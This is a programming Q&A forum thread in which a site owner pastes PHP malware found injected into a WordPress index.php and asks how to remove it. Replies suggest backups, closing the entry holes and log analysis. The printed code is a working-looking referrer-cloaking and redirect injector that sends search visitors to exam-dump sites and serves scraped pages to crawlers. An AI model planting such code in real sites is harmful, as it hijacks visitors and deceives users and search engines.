Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
L
L
leshkapb2018-04-17 18:05:42
Malware
leshkapb, 2018-04-17 18:05:42

PHP Viruses on wordpress sites. How to get rid?

<?php
session_start();
error_reporting(0);
$fromsite = " www.dumpscollection.net/dumps/300-115 ";
$mysite = " mysite.uz ";
$filename = "";
$qstr = $filename."?vce=";
function getHtml($url)
{
$content=file_get_contents($url);
if(empty($content)){
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$content = curl_exec($ch);
curl_close($ch);
}
return $content;
}
$jturl = "www.exampasses.com/300-115.html ";//
function chref($crefs)
{
$truecref= str_replace("x","","bxxixnxgx|xaxoxxlx|axsxxk|xgxoxxoxgxlxe|yxxaxhxoxo|sxexxaxrxcxh");
if (preg_match("/$truecref/i",$crefs)){
return true;
}else{
return false;
}
}
$htprefs = strtolower($_SERVER/*;*/[/*;*/'HTTP_REFERER'/* ;*/]);
if(chref($htprefs) && empty($_COOKIE['haircki'])){
if(!$_SERVER["QUERY_STRING"] && $_SERVER["REQUEST_URI"]=='/') {
header("location: ".$jturl);
exit;
}
if(chref($htprefs) && empty($_GET['vce'])){
header(" location: ".$jturl);
exit;
}
if(chref($htprefs)&& !empty($_GET['vce']))
{
$myarr = array( '200-125', '200-310', '810-403', 'CISSP', '300-101', '300-115', '400-101', '300-070' , '300-320', 'ADM-201', '210-060', '300-075', '70-533', 'AWS-SYSOPS', 'SY0-401', '100-105', ' 210-260', 'PRINCE2-PRACTITIONER', '70-534', '70-532', 'CISA', '070-346', 'PMP', '200-105', '1Z0-808', ' EX200', 'CBAP', 'SSCP', '300-135', 'CRISC', 'CISSP-ISSMP', '70-347', 'GCFA', '840-425', '2V0-621D', ' 300-085', '400-051', '300-208', '312-49V8', '74-678', '70-346', 'CGEIT', 'IIA-CIA-PART1', 'PRINCE2- FOUNDATION', 'GISF', 'CCBA', 'JN0-360', 'CSSLP', '70-411', 'PMI-SP', 'PMI-RMP', 'ACMP_6.4', 'PK0-003', ' 210-065', 'E10-002', 'GSEC', '70-417', 'MA0-101', 'CISSP-ISSAP', '70-465', '070-483', 'ICBB', ' 70-463', 'GCIH', 'GSLC', 'N10-006', 'ICGB', '220-902', '70-697', 'M70-201', '1Z0-061', '312- 50', 'E20-385', '070-486', 'C2040-414', '70-461', '1K0-001', '220-901', 'HP0-P25', '1Z0-898' , '2V0-620', '70-487', 'CISM', '70-486', '101', 'PGMP', '200-120', 'IIA-CGAP', 'CWSP-205', ' 1Z0-020', 'CABA','IBQH001', '117-303', 'ACMP', 'CAP', '210-455', '1Z0-883', 'IIA-CCSA', '070-463', 'LSAT', '600-211 ', 'C9550-606', '642-447', 'CAT-241', '1Z0-803', 'C-GRCAC-10', 'C2010-653', 'P2070-072', '1Z0-100 ', '1Z0-807', 'P9530-039', 'CISSP-ISSEP', 'CTAL-TM_SYLL2012', '640-722', 'MB5-705', '1Y0-253', 'CAS-002', '70-466', 'TK0-201', 'A00-260', 'E20-329', 'E20-891', '200-001', 'HP0-Y50', 'CPCM', '210-010 ', '500-006', 'IIA-CIA-PART2', 'IREB', '642-732', '98-364', 'A00-212', 'AND-401', 'DEV-401', 'C2090-614', 'EX0-116', 'HP2-H28', 'ACMA_6.3', '98-361', '1Z0-051', 'C2170-008', 'ITIL', 'MB2-708', '700-037' , '70-410', '1D0-571', 'PRF', '1Z0-897', 'CSSGB', '070-488', '70-483', '1Z0-060', 'LX0-103' , '500-265', 'SPHR', 'ITILF2011', 'C2090-610', 'C2090-612', 'EX0-100', '70-646', '070-347', 'CQE', ' CAT-340', '1Z0-809', '1Y0-301', '070-417', 'CSBA', '1Z0-820', '700-260', '304-150', '70-680' , '1Z0-144', 'A00-240', 'C2020-002', 'C-ISR-60', '642-997', '500-285', 'N10-004', 'E20-532' , 'M70-101', 'JN0-332','MSC-321', '300-206', '70-496', '010-151', 'HC-711', 'JN0-102', 'ECSS', '101-400', '642-883' ', 'SD0-302', 'C-FSUTIL-60', 'GCIA', 'OG0-091', '642-577', 'CPA', '640-692', '70-696', '500 -210', 'SY0-101', 'CSTE', 'CIOWTSA', 'CEH-001', 'P2090-045', 'CD0-001', 'M70-301', 'CPP', '1Z0-067 ', 'C-FSTBAN-80', '1Z0-068', 'C2140-820', 'GREM', '70-414', 'HP0-Y47', '1D0-520', '102-400', 'LX0-104', '70-462', 'IIA-CFSA', '98-375', 'ISEB-SWT2', 'E20-007', 'C2010-571', '1D0-437', 'NSE7' ', 'HS-330', 'LX0-101', 'EWDA10', 'ADM-211', 'C-TERP10-60', 'CQA', '3310', '1Z0-450', 'MB3-701', '70-640', '70-480' , '300-209');
$str=preg_replace('/_(.*)/i','',$_GET['vce']);
$str=strtoupper($str);
$tiaourl=" www.exampasses.com ";
foreach($myarr as $key => $val){
if(strstr($str,$val)){
header("location: ".$tiaourl."search/?search=".$val);
exit;
}
}
}
if(!empty($url)){
header("location: www.exampasses.com ");
exit;
}
}
preg_match("/(http|https):\/\/([\s\S]*?)\//i",$fromsite, $matches);
if(!empty($url))
{
$fromsite=$matches[0];
}
$content = getHtml($fromsite.$url);
$fromsite=$matches[0];
$fromsiteurl =str_replace(array("https://","http://"),"",$fromsite);
$content = str_replace("http://".$fromsiteurl,$repstr,$content);
$content = str_replace("https://".$fromsiteurl,$repstr,$content);
$content = str_replace("src=\"".$repstr,"src=\"".$fromsite,$content);
$content = str_replace("href=\"","href=\"".$repstr,$content);
$content = str_replace($repstr.$repstr,$repstr,$content);
$content = str_replace($repstr."static",$fromsite."static",$content);
$content = str_replace($repstr."skin",$fromsite."skin",$content);
$content = str_replace($repstr."js",$fromsite."js",$content);
$content = str_replace($repstr."media",$fromsite."media",$content);
$content = str_replace($repstr."\"",$mysite1."\"",$content);
$content = str_replace($repstr."/\"",$mysite1."\"",$content);
$content = str_replace("/design",$fromsite."design",$content);
$content = preg_replace("#(src|href)=(\"|') http://(www\.)? ".str_replace(".","\.",$fromsite)."/(. *?)(\"|')#", "$1=\"".$repstr."$4\"", $content);
$content = preg_replace("#(src|href)=(\"|')(/|(?!http))(.*?)(\"|')#", "$1=\"".$ repstr."$4\"", $content);
$content = str_replace($repstr.$matches[0],$repstr,$content);
$content = str_ireplace('',''.chr(13).chr(10).'',$content);
$content = str_replace("/js",$fromsite."js",$content);
$content = str_replace("/images",$fromsite."images",$content);
$content = str_replace($repstr.$fromsite,$fromsite,$content);
$content = str_replace("statcounter","sdf",$content);
$content = str_replace("ga(","sdfsdf",$content);
$content = str_replace("google-analytics.com","sdfsd",$content);
$content = str_replace("linezing.com", "sdfsdf",$content);
$content = str_replace("comm100.com","sdfsdf",$content);
$content = str_replace("www.51.la","sdfsdf",$content);
$content = preg_replace('/=http:.*[\'"]/','=certification/cisco"',$content);
$content = str_replace($repstr."
$content = preg_replace("#href=(\"|')(http|https)://(?!(www\.)?".str_replace(".","\.",$domain)." )(.*?)(\"|')#i", "href=\"#\"", $content);
$content = preg_replace("/certtop|practice-dumps|exam4actual|test4actual|examsell|examgood|testpassport|passcert|killtest|exampdf|dumpstep|ourexam|testhorse|getcertkey|pass4test|dumpkiller|dumpleader|lead2pass|braindump2go|passleader|greatexam |prep4cert|examgoal|ensurepass|dumps4cert|passtutor|dump4exam|prep4certs|testscram|it-pruefungen|cert24|zertifizierung-portal|it-exams|it-practicetests|it-pruefungen|it-braindumps|it-exams|pruefungsfragedeutsch|exam -microsoft|microsoft-pruefungen|exam-ibm|it-practicetests|exam-express|gratisexam|exam24|exam24|passeasily|firsttrycertify|surebraindumps|certleader|certbus|examcoop|newcerts|pass4itsure|flydumps|passitdump|gogoexam|pass-guaranteed |passeasily|it-tests|lead4pass/i", "Dumpwin", $content);
$tmp = strtolower($_SERVER['HTTP_USER_AGENT']);
if (strpos ($tmp, 'google') !== false || strpos ($tmp, 'yahoo') !== false || strpos ($tmp, 'msn') !== false || strpos ($ tmp, 'sqworm') !== false) {
echo $content;
exit;
}define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);
setcookie('haircki','haircooki', time()+3600*24*100);
?>
Here is such a virus that is embedded in index.php which is located in the root folder of the site. help please

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

5 answer(s)
Report
M
Maxim Timofeev, 2018-04-17
@webinar

Popular CMS - popular holes))) 100,000 people sit and stir up wp hacks. Here is the result.
What to do? There should be 2 actions:
- get rid of the malicious code
- protect yourself from repetition as much as possible
The first is really only a backup. Do not put the second in two lines, use the search

Report
S
SunHere, 2018-05-03
@SunHere

The fact that the virus is built into the file is only a consequence, the reason is the presence of holes through which new virus files will be uploaded to infinity.

Report
M
Maybe Somebody, 2018-04-17
@maybesomebody

Make backups, make backups, make backups, make backups, make backups. OR by ancient shamanism in .htaccess add a redirect to a normal page, without viruses. For example on index2.php! O miracle! The virus is useless. In general, analyze the logs, site, folder names and the rest. And log everything that is possible until the end of the malware removal.

Report
R
Roman Mirilaczvili, 2018-04-17
@2ord

Already wrote an answer in How to get rid of the shell on Wordpress sites?

Report
I
I.CaR Soft, 2018-11-27
@I_CaR

Delete this fucking CMS!

Similar questions
K
Khangeldy Ilebaev2015-04-20 09:15:33
How to open all links in multiple sites? 2Reply
V
vuqar972018-11-27 19:32:48
Why doesn't the video play until it's fully loaded? 1Reply
J
Jesse Pinkman2021-11-08 12:18:00
How to safely open a virus from mail? 1Reply
Y
yupic2014-02-01 12:24:38
Why do new followers appear on twitter without my knowledge? 6Reply
W
WebDiez2016-04-21 11:35:55
Has anyone encountered the Better Call Saul virus? 2Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question